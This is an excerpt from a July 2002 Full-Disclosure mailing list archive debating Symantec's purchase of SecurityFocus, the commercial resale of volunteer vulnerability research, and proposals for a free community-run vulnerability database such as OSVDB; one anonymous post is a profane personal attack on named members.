keeping and validating the checksum or digital singnature of the whole vouchers file (not only individual vouchers). For that, however, both Adobe Acrobat eBook Reader and Adobe Content Server should be seriously upated. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQEVAwUAPTfsT4avf/iY3ldlAQEDtQgAn7NNvstQnqRs761Q0SNIo7SgSEO9V0Gn oSzuAFyBQHlqpnDBRSpBowKfjcnPOANzXBiaXsJ4ebzRHVxLFatGdg+MCFRujF3d sUGQf3dM7V1rgNY7sjStsLsraJ0Ku+JSi4Ol4hQH19upmFXki0BnRMPjoGlxumr7 Ii+TSL0F4/Z8zcLtfl6PyAkGc0vKMNrYhWVZp/fc9GMRiI62MU0mZ2utHiuxF7JO gaQP0q5nFr40WTL1SIVfI4+YnLaErs5Sq4PVsn+7MgcoFGvjI6i8FxVT6Yj7BlWe BszoBYcm3jNiQ2uay9QhKAMNG+wXsyyJytpS/NeQhnv/MuuRZ+G4qQ== =Yll/ -----END PGP SIGNATURE----- From emoyle at scsnet.csc.com Fri Jul 19 14:41:55 2002 From: emoyle at scsnet.csc.com (Ed Moyle) Date: Fri, 19 Jul 2002 09:41:55 -0400 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. Message-ID: <3BD76687A1CBD74097E37CB67263AE973559B0@scsetbmail.scsnet.csc.com> On Thursday, July 18, 2002 22:57, Brian Hatch wrote: > This and other 'Protect your code with the DMCA' ideas are interesting. > So we lock down our exploits with crappy encryption, hope someone uses > them, and sue. Hopefully we win, and we get a nice check. > And the DMCA has just been upheld in court. It does make a point about the stupidity of the DMCA, though... Win or lose, there is victory. If you win, somebody stealing your work gets slapped. If you lose, the DMCA is weakened. However, I spent some time thinking about this yesterday, and I've come to the conclusion that I *want* the "good guys" to be able to scan for exploits. If, through my actions, I make it harder for somebody to defend their network or whatever from attack, I don't want that. That's the reason I think most people post vulnerabilities anyway: they want to help the community rather than hurt it. It is just a shame that many companies don't have the same morality, and simultaneously make it harder for the good guys to fight the good fight and make money off of the work that people are freely donating. It is a problem in my opinion. I don't care if I don't get any credit or cash from research; that's not why I do it in the first place. Instead it is about giving back to a community that has given freely to me... -E From fulldisclose at uuuppz.com Fri Jul 19 14:46:02 2002 From: fulldisclose at uuuppz.com (James Martin) Date: Fri, 19 Jul 2002 14:46:02 +0100 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <3D372B94.5050905@bokeoa.com> <20020719003830.GA34944@edgemaster.zombie.org> <3D3762E2.1080007@thievco.com> Message-ID: <005301c22f2a$a0743f20$0aaca5c2@vitalograph.ie> > Release exploits with the vaguest of descriptions as to how they work > (lost for examples -- just copy'n'paste the "technical bits" of some > of the security bulletins from MS...). Have the _only_ PoC code a > compiled binary loaded with copyright notices forbidding reversing, > etc. Be sure to use some "encryption" (extremely trivial is OK as > complexity doesn't matter; can you say XOR?) in the PoC to "protect" > the important secret (generally the overflow "string" itself). Be Ummm surely just sniffing the exploit string being sent, will reveal the string itself in 99% of cases (remote exploits that is). Is watching the data a program sends across a network reverse engineering?? Regards James From security at ricalo.com Fri Jul 19 14:55:41 2002 From: security at ricalo.com (Georg Reitschmidt) Date: 19 Jul 2002 15:55:41 +0200 Subject: [Full-Disclosure] List charter In-Reply-To: <20020719015237.A14267@netsys.com> References: <15671.27294.429521.488602@mail.linux-delhi.org> <20020719015237.A14267@netsys.com> Message-ID: <1027086957.1175.1.camel@ricalo> hm why signing a message with gpg when not publishing the key.... Am Fre, 2002-07-19 um 07.52 schrieb Len Rose: > Hi.. > > This is as close to an official statement as I can get. > > We will not make commercial use of this list, or > from the contents of this list. We will not promote our > services, or misuse this list to further ourselves or > any other entity. > > We will all profit by the knowledge, and intelligence we > gather to be used in our research, our jobs, and on our systems > and networks. > > We don't want to repeat the same mistakes, and hopefully with > everyone's help, we won't. > > > Raju Mathur wrote: > > > Maybe this is the right time for bringing this up. > > > > Would the list admins kindly take the time to clarify their position on > > the potential of this list going commercial at any time? A simple > > statement like `the archives of this list, subscription to the list > > and posting privileges to the list shall always remain free for > > everyone' would do. Preferably PGP-signed. > > > > After CDDB, MAPS and ARIS I'm more than a bit concerned about > > commercialisation of databases created by volunteer contributions. > > > > Regards, > > > > - -- Raju > > - -- > From weld at vulnwatch.org Fri Jul 19 16:10:26 2002 From: weld at vulnwatch.org (Chris Wysopal) Date: Fri, 19 Jul 2002 15:10:26 +0000 (GMT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: Message-ID: On Thu, 18 Jul 2002, Jay D. Dyson wrote: > Perhaps the best way to beat these cash hounds at their own game > is to start using a strictly not-for-profit licensing on all released > advisories and proof-of-concept code which stipulates that for-profit > companies may not use said information in any way. Even if you put a copyright notice on your advisories and give permission for non-profits to redistribute, the for-profits will just reword the information for their database. It usually takes several days to research and create an advisory and many hours of working with the vendor to get them to fix it. The vuln reporter gets some street cred. The for-profit retypes the information and probably makes a few thousand dollars PER ADVISORY. And several for-profits are doing this. > Let's face it: the for-profit companies have been leeching off the > community for years and giving nothing back save for sponsorship of key > escrow, further draconian legislation, and advocacy of a security cabal > (which they would control) that would take free information and bundle it > as a pay-for product/service. The only way to stop the leeching is to have a free vulnerability database. There could be a site where vuln reporters could enter the information into the database themselves. This database would always be the most up to date and the most accurate. If there was a standardized vuln reporting format perhaps the import to the databse could be automated. Mirroring of the database around the world would be encouraged. I would love VulnWatch to be able to do this. Any volunteers? > Look, I have nothing against someone trying to make a buck. That > is the cornerstone of the capitalist system. What burns my biscuits is > that the monolithic security companies are not making this money off their > own efforts[1], but by leeching off the egalitarian contributions of those > who possess a skill set the businesses are not willing to pay for. Agreed. I have struggled with the model that exists for many years. It seems the only way to make money off of vuln information is to sell a database and the people selling them do not pay the vulnerability reporters for their effort. Let's face it. There would be no security information business without all the people donating their knowledge for free. Of all the vuln database companies SecurityFocus has been the best at giving back to the community and they say this won't change. Even so a completely non-corporate and free vuln database would be something good for the community. -Chris > - -Jay > > 1. About the only real effort I see from corporate security firms these > days is whipping up FUD-filled press releases to scare the living > bejeezus out of the masses about "cyber-terrorism" and other happy > horseshit. > > ( ( _______ > )) )) .--"There's always time for a good cup of coffee"--. >====<--. > C|~~|C|~~| (>------ Jay D. Dyson -- jdyson at treachery.net ------<) | = |-' > `--' `--' `-- I'll be diplomatic...when I run out of ammo. --' `------' > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (TreacherOS) > Comment: See http://www.treachery.net/~jdyson/ for current keys. > > iD8DBQE9NydyGI2IHblM+8ERAnaNAKCAbUUQpAJLuGrkqxlOsflXBJm6dACgkSlH > Y4MHjqIe6qAM28/cSenTBTA= > =9ErK > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > From haiku at hushmail.com Fri Jul 19 19:03:58 2002 From: haiku at hushmail.com (haiku at hushmail.com) Date: Fri, 19 Jul 2002 11:03:58 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... Message-ID: <200207191803.g6JI3w141312@mailserver2.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >From the Haiku Hacker for Mr. Wysopal: Houses - ---------- Fat Checks Are Good Biz They buy warm houses for March Is yours made of glass? >Even if you put a copyright notice on your advisories and give permission >for non-profits to redistribute, the for-profits will just reword the >information for their database. It usually takes several days to research >and create an advisory and many hours of working with the vendor to get >them to fix it. The vuln reporter gets some street cred. The for-profit >retypes the information and probably makes a few thousand dollars PER >ADVISORY. And several for-profits are doing this. Or better, thousands per advisory when a consultant for a certain company shows up to audit networks. What's @stake's billable rate these days? >The only way to stop the leeching is to have a free vulnerability database. >There could be a site where vuln reporters could enter the information into >the database themselves. This database would always be the most up to date >and the most accurate. If there was a standardized vuln reporting format >perhaps the import to the databse could be automated. Mirroring of the >database around the world would be encouraged. > >I would love VulnWatch to be able to do this. Any volunteers? I'll not even touch this. I could make fun of several hypocrits on this list, but like anybody in the industry that actually contributes, I have a regular job; one that doesn't involve stroking and petting my ego. KTHX. >Agreed. I have struggled with the model that exists for many years. It >seems the only way to make money off of vuln information is to sell a >database and the people selling them do not pay the vulnerability >reporters for their effort. Let's face it. There would be no security >information business without all the people donating their knowledge for >free. > >Of all the vuln database companies SecurityFocus has been the best at >giving back to the community and they say this won't change. Even so a >completely non-corporate and free vuln database would be something good for >the community. Ok. I've been a passive observer on this list since receiving an unsoliticed email from the purveyors. I must admit, this has been one of the most educational experiences I've had in my time in this industry. Look at some of the names here: Jay Dyson, Steve Manzuik, Chris Wysopal, KF, Blue Boar, Len Rose. Notable hackers. Now, it's time to cut the shit. First and foremost, let me say this list is complete dogshit. I'd like to go on the record with my opinion being that moderated mailing lists are a good thing. It keeps all the fucking whining to a minimum. You think I actually care that your information is being resold? No! I just want the information, delivery medium negotiable. I could give a fat rats ass if you get credit, either. That's one thing I can say for any vulnerability database; at least I don't have to listen to a bunch of punkasses and their incessant boohooing; instead, I get just the pertinent information. At the end of the day, I don't give a fuck who you are, or how great you think you are; I care that my systems are secure, and that's the bottom line. Second, I've been amazed at what big fucking morons the "esteemed hackers" in the community are. Especially Chris and Jay. Wow! I thought you guys were really intelligent, and to some extent, had a moderate amount of respect for you two. The only thing I've seen from any of you at this point is hidden agenda. You guys are truely disgusting. You guys set the bar for low. Proof that nothing is ever what it seems. Third, I can't believe that not a single one of you dickless, amoebic, mental-myopics has even BOTHERED to look at the other people in this "industry" that are regularly exploited, and use the information we supply for the sake of creating something for the common good. The first person that comes to mind is Renaud Deraison. Yeah, you guys are fucking brilliant, right? Make the information copyrighted, so he can't continue to work on a FREE project continually exploited, and at least try to sell support so he can pay the fucking rent? Jesus. And let's not even talk about Marty Roesch. If there's another person that knows something about giving heart and soul to a project, and continually getting exploited, he's our man. He runs a great project, and I'll bet not a single one of you whining bitches hasn't used it, and if you consult, haven't provided it as a "solution" that you charged some company billable hours for. So now you want to take the information that he needs as well, and restrict him from it? Looks to me like he's finally getting his company off the ground, and you guys want to fuck him now too? I can't believe the amount of fucking "idealists" we have here that think they know how to fix the fucking world by fucking the people that actually do some good in it. Fuck each and every one of you. I can only hope that one day, you finally dislodge your head from your ass and realize the ramifications of your self-serving agenda. I have my doubts about it happening, though. Furthermore, I'm thankful to see that people like Chris and Jay have actually come out of the closet to show what fucking miserable, narcissistic, ugly people they really are. It's high-time that we finally get an idea of the wheat and chaff in this industry, and seperate them. I still nearly fall off my chair with laughter when I visualize Chris sucking up to MS, and trying to push the "responsible disclosure" agenda while moderating an allegedly "full disclosure" list, and posting to others. You're a man of many faces, Chris, all of them in twos. I'll not even pick on Jay; I really feel pity on him. haiku -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wloEARECABoFAj04VL4THGhhaWt1QGh1c2htYWlsLmNvbQAKCRDCt+udg2XXBxmvAKCQ Jnp8MzKRvrMZQd6HqG4L+BrtjACfebxiRLkqjo6hCOzXri1xbmLoqdg= =ANWm -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From hellnbak at nmrc.org Fri Jul 19 19:54:27 2002 From: hellnbak at nmrc.org (hellNbak) Date: Fri, 19 Jul 2002 14:54:27 -0400 (EDT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <200207191803.g6JI3w141312@mailserver2.hushmail.com> Message-ID: > Houses > - ---------- > Fat Checks Are Good Biz > They buy warm houses for March > Is yours made of glass? OK, so now the idiots who don't have the necessary social skills to get paying jobs start tossing rocks at those who work for a living. Yeah, fat checks are a good biz you are damn right, and what is wrong with that? If you are good at something, go get a job doing that which you are good at. How can you fault someone for that? Weld Pond has contributed more to the security industry in general than half the fucks on this list INCLUDING ME! It is no surprise that his skill are in demand, do you expect him to flip burgers for a living? I have had my shares of run-ins with the guys at Security Focus but do you think I fault them for getting $75million. Shit no, I hope after the VCs are done with them that Al and the crew each put a million or so in their pocket. I may not agree with everything SF has done or is going to do but that is their choice and you can't fault them for making money. > Or better, thousands per advisory when a consultant for a certain company shows up to audit networks. What's @stake's billable rate these days? The difference here is that the consultant you are talking about in this case WROTE THE FUCKING ADVISORY. Stop bitching and start contributing. Why is everyone so against security consultants that have a clue? Whats a matter your script kiddie tools aren't as effective anymore? Jealous that you just can't seem to make a big discovery yourself? (heh, I know I am) What we should be bitching about are the moronic (usually big 5) consulting companies that have no clue and rely on FUD and commercial products to do their work for them. > I'll not even touch this. I could make fun of several hypocrits on this > list, but like anybody in the industry that actually contributes, I have > a regular job; one that doesn't involve stroking and petting my ego. What does wanting to contribute a free vulnerability database have to do with petting ones ego? This is about keeping the information free and helping EVERYONE in the industry. Oh yeah, I forgot, this means that people might actually start patching boxes making your s'kiddiot tools not work. This in-fighting and finger pointing is complete bullshit gweeds style. Why not work together for a common good? > Now, it's time to cut the shit. I agree. > First and foremost, let me say this list is complete dogshit. I'd > like to go on the record with my opinion being that moderated mailing > lists are a good thing. It keeps all the fucking whining to a minimum. Again, I agree, moderation prevents abuse. But, moderation also makes certain people whine that they are being censored.....blah..cry me a river. > Second, I've been amazed at what big fucking morons the "esteemed hackers" > in the community are. Especially Chris and Jay. > Wow! I thought you guys were really intelligent, and to some extent, > The only thing I've seen from any of you at this point is hidden agenda. > You guys are truely disgusting. You guys set the bar for low. Proof > that nothing is ever what it seems. Explain what you feel this hidden agenda is? I consider both Jay and Chris to not only be true hackers but to also be friends. So other than a bit of common sense what is the hidden agenda? > And let's not even talk about Marty Roesch. If there's another person > that knows something about giving heart and soul to a project, and > continually getting exploited, he's our man. He runs a great project, If anything, ALL of us should be writing and contributing more NEssuss signatures for stuff. > Furthermore, I'm thankful to see that people like Chris and Jay have > actually come out of the closet to show what fucking miserable, > narcissistic, ugly people they really are. It's high-time that we > finally get an idea of the wheat and chaff in this industry, and > seperate them. I still nearly fall off my chair with laughter when > I visualize Chris sucking up to MS, and trying to push the > "responsible disclosure" agenda while moderating an allegedly > "full disclosure" list, and posting to others. You're a man of > many faces, Chris, all of them in twos. I'll not even pick on Jay; > I really feel pity on him. Now this is a load of shit. Responsible Full Disclosure means working with a vendor to get something fixed and then releasing and advisory - NOT blindsiding a vendor with one days notice or no notice at all. What is wrong with Chris, a moderator of VulnWatch, getting invovled in the whole responsible full disclosure thing? I would rather have him involved because he has a clue than some moron like Russ Cooper or even worse the MS people alone. As for VulnWatch -- vulnwatch is full disclosure a post has never been rejected based on the status of a vendor. Yeah, they encourage people to work with vendors but they don't force it. I KNOW THIS FOR A FACT! Its time for the so called community to put up or shut up. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "I don't intend to offend, I offend with my intent" hellNbak at nmrc.org http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From weld at vulnwatch.org Fri Jul 19 21:38:21 2002 From: weld at vulnwatch.org (Chris Wysopal) Date: Fri, 19 Jul 2002 20:38:21 +0000 (GMT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <200207191803.g6JI3w141312@mailserver2.hushmail.com> Message-ID: On Fri, 19 Jul 2002 haiku at hushmail.com wrote: > Or better, thousands per advisory when a consultant for a certain > company shows up to audit networks. What's @stake's billable rate > these days? As a consulting company that publishes vulnerability information and tools, we contribute to the pool that we drink out of. > First and foremost, let me say this list is complete dogshit. I'd like > to go on the record with my opinion being that moderated mailing lists > are a good thing. It keeps all the fucking whining to a minimum. You > think I actually care that your information is being resold? No! I > just want the information, delivery medium negotiable. I could give a > fat rats ass if you get credit, either. That's one thing I can say for > any vulnerability database; at least I don't have to listen to a bunch > of punkasses and their incessant boohooing; instead, I get just the > pertinent information. At the end of the day, I don't give a fuck who > you are, or how great you think you are; I care that my systems are > secure, and that's the bottom line. > So would you use a non-profit database that was populated by the vulnerability reporters themselves? That is what I am proposing. > Second, I've been amazed at what big fucking morons the "esteemed > hackers" in the community are. Especially Chris and Jay. Wow! I > thought you guys were really intelligent, and to some extent, had a > moderate amount of respect for you two. The only thing I've seen from > any of you at this point is hidden agenda. You guys are truely > disgusting. You guys set the bar for low. Proof that nothing is ever > what it seems. For wanting a public vulnerability database? This is what the security community is currently missing in a public and open format. There are open source NIDS, vuln scanners, and other security tools. There are public security mailing lists. There is a public vuln dictionary, CVE. But there is no public vuln database. Why is everything else good to have non-commercial alternatives for except a vuln database? The open source tools could tie into it. > > supply for the sake of creating something for the common good. The > first person that comes to mind is Renaud Deraison. Yeah, you guys are > fucking brilliant, right? Make the information copyrighted, so he > can't continue to work on a FREE project continually exploited, and at > least try to sell support so he can pay the fucking rent? Jesus. I certainly didn't mention restricting information. A public vulnerability database would require the information to be open so that it could be in the database. > And let's not even talk about Marty Roesch. If there's another person > that knows something about giving heart and soul to a project, and > continually getting exploited, he's our man. He runs a great project, > and I'll bet not a single one of you whining bitches hasn't used it, > and if you consult, haven't provided it as a "solution" that you > charged some company billable hours for. So now you want to take the > information that he needs as well, and restrict him from it? Looks to > me like he's finally getting his company off the ground, and you guys > want to fuck him now too? @stake employees have contributed to the Snort project. I actually was using Snort earlier today on a product pen test. It's great. Marty has created something wonderful. A public vulnerability database would enhance Snort not hurt it. We don't really do implementation work but we have recommended to some of our customers that they install Snort. > seperate them. I still nearly fall off my chair with laughter when I > visualize Chris sucking up to MS, and trying to push the "responsible > disclosure" agenda while moderating an allegedly "full disclosure" > list, and posting to others. You're a man of many faces, Chris, all of > them in twos. I'll not even pick on Jay; I really feel pity on him. You can support the First Amendment and still limit what you personally say and write. I choose not to be vulgar in my list postings and I might even advocate for others to not be vulgar but I would never want to ban that langauge. I think it is a benfit to security if people can patch their boxes before exploits are written. Nothing is a single bullet solution but I think that certain disclosure practices can help make this happen. Obviously a lot has to be done better on the vendor side. So while advocating for people to follow certain disclosure practices I still don't think there should be a law restricting free speech. Once someone has chosen to publish information they are going to publish it. It is better for the community that VulnWatch approve these messages so that everyone can get the information at the same time. -Chris > haiku > -----BEGIN PGP SIGNATURE----- > Version: Hush 2.1 > Note: This signature can be verified at https://www.hushtools.com > > wloEARECABoFAj04VL4THGhhaWt1QGh1c2htYWlsLmNvbQAKCRDCt+udg2XXBxmvAKCQ > Jnp8MzKRvrMZQd6HqG4L+BrtjACfebxiRLkqjo6hCOzXri1xbmLoqdg= > =ANWm > -----END PGP SIGNATURE----- > > > Communicate in total privacy. > Get your free encrypted email at https://www.hushmail.com/?l=2 > > Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > From cmeik at gawble.net Fri Jul 19 21:41:30 2002 From: cmeik at gawble.net (Christopher Meiklejohn) Date: Fri, 19 Jul 2002 16:41:30 -0400 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... Message-ID: Second, I've been amazed at what big fucking morons the "esteemed hackers" in the community are. Especially Chris and Jay. Wow! I thought you guys were really intelligent, and to some extent, had a moderate amount of respect for you two. The only thing I've seen from any of you at this point is hidden agenda. You guys are truely disgusting. You guys set the bar for low. Proof that nothing is ever what it seems. For wanting a public vulnerability database? This is what the security community is currently missing in a public and open format. There are open source NIDS, vuln scanners, and other security tools. There are public security mailing lists. There is a public vuln dictionary, CVE. But there is no public vuln database. Why is everything else good to have non-commercial alternatives for except a vuln database? The open source tools could tie into it. I think that a public vuln database would be incredibly useful. I find that when security advisories are released, trying to search through all of the security companies websites for more information on how it is being exploited, and also how it is going to affect my systems, rather... tedious. I also think that tying them to the open source tools, or leaving it open so that they could be, would also be a great idea. Having to find up-to-date signatures for all of the security software, is another task that could be easily automated with something like that. I know that their are other reasons being discussed on this list about the idea of the public vuln database, but, I just thought that I would throw out my $0.02. --Chris Christopher Meiklejohn cmeik at gawble.net -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 1777 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020719/d839dd20/attachment.bin From coley at linus.mitre.org Fri Jul 19 21:42:13 2002 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 19 Jul 2002 16:42:13 -0400 (EDT) Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database Message-ID: <200207192042.QAA24360@linus.mitre.org> Jay D. Dyson said: > Look, I have nothing against someone trying to make a buck. That > is the cornerstone of the capitalist system. What burns my biscuits is > that the monolithic security companies are not making this money off their > own efforts[1], but by leeching off the egalitarian contributions of those > who possess a skill set the businesses are not willing to pay for. With organizations like CERT/CC projecting 4,000+ vulnerabilities this year alone, the amount of research and quality-checking that is required to maintain a good vulnerability database is growing prohibitive, even if most of the vulnerabilities were discovered and announced by many people in the community. As suggested by others, a publicly maintained vulnerability database is a possibility, but it would need a large-scale community effort to populate and maintain, and there would be issues of quality control. Maintaining a vulnerability database also requires some different skills than vulnerability research or system administration: - a stronger emphasis on writing for multiple audiences (technical details and high-level summaries) - identifying different technical areas and finding/keeping skilled people to cover them (e.g. crypto, Linux kernels, CGI, programming languages, etc.) - defining what will be in the database (this was an issue in the early days of CVE because everyone has different definitions of "vulnerability," and it's still an issue to some degree) - ironing out details like workaround and fix information (even determining whether the vendor has fixed the problem can be a challenge; researcher-suggested patches can be broken; some workarounds aren't feasible) - trying to distinguish between closely related vulnerabilities (is there one vulnerability or two? Did vendor X and Y really fix the same issue? Did vendor W's fix really address researcher Z's report from two months earlier?) - deciding on a severity metric (IMHO, high/medium/low must die) - getting consistent terminology (your XSS is not my XSS (or CSS)! Same with remote/local, directory traversal, etc.) - ensuring accuracy of information (which is sometimes problematic even in "full disclosure" instances) - actually validating whether the reported vulnerabilities are real or not (a daunting challenge for anything but the most commonly deployed products and configurations) - then designing, implementing, and maintaining the databases and the server(s) that support it. Chris Wysopal said: >Even so a completely non-corporate and free vuln database would be >something good for the community. NIST's ICAT database (http://icat.nist.gov) is freely available for download. It is built on top of the CVE list. Unfortunately, that means that some of CVE's challenges pose difficulties for ICAT, e.g. with respect to CVE's delays in making candidate numbers available after an issue has been disclosed. (BTW, we're focusing on improving our timeliness, which should improve noticeably in the coming months.) If everyone is serious about building and maintaining their own open vulnerability database, then consider using the following resources: 1) Working group reports from the 2nd vulnerability database workshop at Purdue CERIAS, January 1999, especially the appendices. There is some good discussion regarding issues in creating "open" or "federated" vulnerability databases. http://www.cs.purdue.edu/coast/papers/99-06.ps (Google offers this file in text format, but the document structure is lost a little. http://citeseer.nj.nec.com/meunier99final.html may provide alternate formats) 2) Purdue CERIAS has done some followup work in trying to create a public vulnerability database. "Sharing Vulnerability Information using a Taxonomically-correct, Web-based Cooperative Database" https://www.cerias.purdue.edu/papers/archive/2001-03.pdf Steve Christey CVE Editor From fdlist at digitaloffense.net Fri Jul 19 21:59:51 2002 From: fdlist at digitaloffense.net (H D Moore) Date: Fri, 19 Jul 2002 15:59:51 -0500 Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database Message-ID: <200207191559.51346.fdlist@digitaloffense.net> (sent this from the wrong account earlier, moderators please ignore the previous post) On Friday 19 July 2002 15:38, Chris Wysopal wrote: > So would you use a non-profit database that was populated by the > vulnerability reporters themselves? That is what I am proposing. I just started a similar project. Have about two dozen volunteers and am working on the first draft docs for schema, requirements, moderation, and licensing. The domain/project name is osvdb.org, the goal is to provide a community-run vulnerability database catering to the needs of system administrators and security professionals alike. We were planning on doing this earlier, even went so far as to hire someone to create a nice Oracle schema, but lacked the time and urgency to do it until now. One of the primary goals is to allow user feedback on vulnerabilities, such as problems applying patches in a given environment or exploiting the bug on a specific architecture. The submission process will have to be moderated, moderators would be volunteers from the industry who would like to contribute to something immediately useful. My company, Digital Defense, has commited to populating the database with our own in-house data set, which should be at least get the ball rolling. Much of the correlation work has already been done, so integrating CVE/BID/Nessus/Snort references should be pretty far along from the beginning. Licensing terms will probably be GPLv2, we want OSS developers to be able to use exports from the database for their own tool reporting. While I would like to prevent commercial scan-in-a-box companies from abusing it, theres no licensing system I can think of that will prevent that but still allow consultants to provide reports using the verbage. Plagiarism is absolutely not allowed, only exception being quotes from the Vendor pertaining to the product, and those must be noted as such. Below is a mini-annoucement that was sent in reply to Jay's post on the Nessus mailing list... --- To: "Jay D. Dyson" Date: Thu, 18 Jul 2002 03:53:24 -0500 On Wednesday 17 July 2002 17:47, Jay D. Dyson wrote: > On 18 Jul 2002, Michel Arboi wrote: > > Just curious: will they consider the Nessus community as "trusted > > security researchers" or as a gang of dangerous terrorists? > > > > Should we ask them? Just like this? > > Yes and yes. > > I may catch hell for this, but I see the corporate community as > not exactly having the Open Source world's best interests at heart. Just > have a look at the sort of legislation and lobbying they carry out under > the guise of "security." It's enough to make a body swear off computing > forever... After talking to a SF employee and reading the two announcements that were sent out, this is the impression that I got: Symantec is allowing the mailing lists and SF web site to be operated just as it was previously by the same people. Their disclosure policy only applies to vulnerabilities *found* by them, it has no bearing whatsoever on the list traffic or exploits on the web site. The only piece I am worried about is whether not-quite-public-bugs, such as those reported through the vuln-help list or during vendor coordination, will be made known to "trusted security researchers" at Symantec before release. Symantec could always change their mind later, making all of the above null and void, but considering the dedication of the Security Focus staff and their full-dislosure views, I am willing to give it a chance and see how things work out. Regardless, the deal is not final until August sometime. On another note, an open source vulnerability database project has been started. This database will be filled and maintained by the community, providing complete support for CVE, Bugtraq, Nessus, and Snort. We are still in the design phase, gathering requirements from system administrators and pen-testers alike, hashing out the table structure, and deciding where to host it. Myself and a few of the DDI staff are going to populate it with what we can, but once the interface is up and volunteers are found, it will be in the hands of the community. The database will be exportable in a number of different formats and can be included and used by open source security tools. There may be some restrictions on commercial use (no sense keeping the idiots in business), but those restrictions will have to be approved by the community first. If you have any suggestions, ideas, questions, flames, or just want to get involved; please email them to osvdb at digitaloffense.net for the time being. -HD ------------------------------------------------------- From pmeunier at cerias.purdue.edu Fri Jul 19 22:17:36 2002 From: pmeunier at cerias.purdue.edu (Pascal Meunier) Date: Fri, 19 Jul 2002 16:17:36 -0500 Subject: [Full-Disclosure] Re: Creating a publicly maintained vulnerability database In-Reply-To: <200207192042.QAA24360@linus.mitre.org> References: <200207192042.QAA24360@linus.mitre.org> Message-ID: We have just overhauled our cooperative vulnerability database (fixing many bugs), adding an exploit section with IDS rules, and modifying it to allow the use a moderation process instead of a 3-reviewer process. What is interesting about it is that anybody can improve a record by working on a copy and submitting it so that it will supersede the original. As a basis it imports CVE information daily but it is not bound by it. One drawback to it is that operational policies have not been clearly defined; another is that there currently isn't enough information in it. Please have a look; accounts are and will remain free. We will keep working on it. Feel free to make suggestions too, for features or operational policies. At this point, I would very much like to know what else it would take for the community to get involved in it, and I am willing to share the stewardship with interested individuals and companies. It is publicly accessible at: https://cirdb.cerias.purdue.edu/coopvdb/public/ Cheers, Pascal Meunier Assistant Research Scientist, CERIAS At 4:42 PM -0400 7/19/02, Steven M. Christey wrote: >Jay D. Dyson said: > >> Look, I have nothing against someone trying to make a buck. That >> is the cornerstone of the capitalist system. What burns my biscuits is >> that the monolithic security companies are not making this money off their >> own efforts[1], but by leeching off the egalitarian contributions of those >> who possess a skill set the businesses are not willing to pay for. > >With organizations like CERT/CC projecting 4,000+ vulnerabilities this >year alone, the amount of research and quality-checking that is >required to maintain a good vulnerability database is growing >prohibitive, even if most of the vulnerabilities were discovered and >announced by many people in the community. > >As suggested by others, a publicly maintained vulnerability database >is a possibility, but it would need a large-scale community effort to >populate and maintain, and there would be issues of quality control. > >Maintaining a vulnerability database also requires some different >skills than vulnerability research or system administration: > >- a stronger emphasis on writing for multiple audiences (technical > details and high-level summaries) > >- identifying different technical areas and finding/keeping skilled > people to cover them (e.g. crypto, Linux kernels, CGI, programming > languages, etc.) > >- defining what will be in the database (this was an issue in the > early days of CVE because everyone has different definitions of > "vulnerability," and it's still an issue to some degree) > >- ironing out details like workaround and fix information (even > determining whether the vendor has fixed the problem can be a > challenge; researcher-suggested patches can be broken; some > workarounds aren't feasible) > >- trying to distinguish between closely related vulnerabilities (is > there one vulnerability or two? Did vendor X and Y really fix the > same issue? Did vendor W's fix really address researcher Z's report > from two months earlier?) > >- deciding on a severity metric (IMHO, high/medium/low must die) > >- getting consistent terminology (your XSS is not my XSS (or CSS)! > Same with remote/local, directory traversal, etc.) > >- ensuring accuracy of information (which is sometimes problematic > even in "full disclosure" instances) > >- actually validating whether the reported vulnerabilities are real or > not (a daunting challenge for anything but the most commonly > deployed products and configurations) > >- then designing, implementing, and maintaining the databases and the > server(s) that support it. > > > >Chris Wysopal said: > >>Even so a completely non-corporate and free vuln database would be >>something good for the community. > >NIST's ICAT database (http://icat.nist.gov) is freely available for >download. It is built on top of the CVE list. Unfortunately, that >means that some of CVE's challenges pose difficulties for ICAT, >e.g. with respect to CVE's delays in making candidate numbers >available after an issue has been disclosed. (BTW, we're focusing on >improving our timeliness, which should improve noticeably in the >coming months.) > > >If everyone is serious about building and maintaining their own open >vulnerability database, then consider using the following resources: > >1) Working group reports from the 2nd vulnerability database workshop > at Purdue CERIAS, January 1999, especially the appendices. > > There is some good discussion regarding issues in creating "open" > or "federated" vulnerability databases. > > http://www.cs.purdue.edu/coast/papers/99-06.ps > > (Google offers this file in text format, but the document structure > is lost a little. http://citeseer.nj.nec.com/meunier99final.html > may provide alternate formats) > >2) Purdue CERIAS has done some followup work in trying to create a > public vulnerability database. > > "Sharing Vulnerability Information using a Taxonomically-correct, > Web-based Cooperative Database" > > https://www.cerias.purdue.edu/papers/archive/2001-03.pdf > > > >Steve Christey >CVE Editor 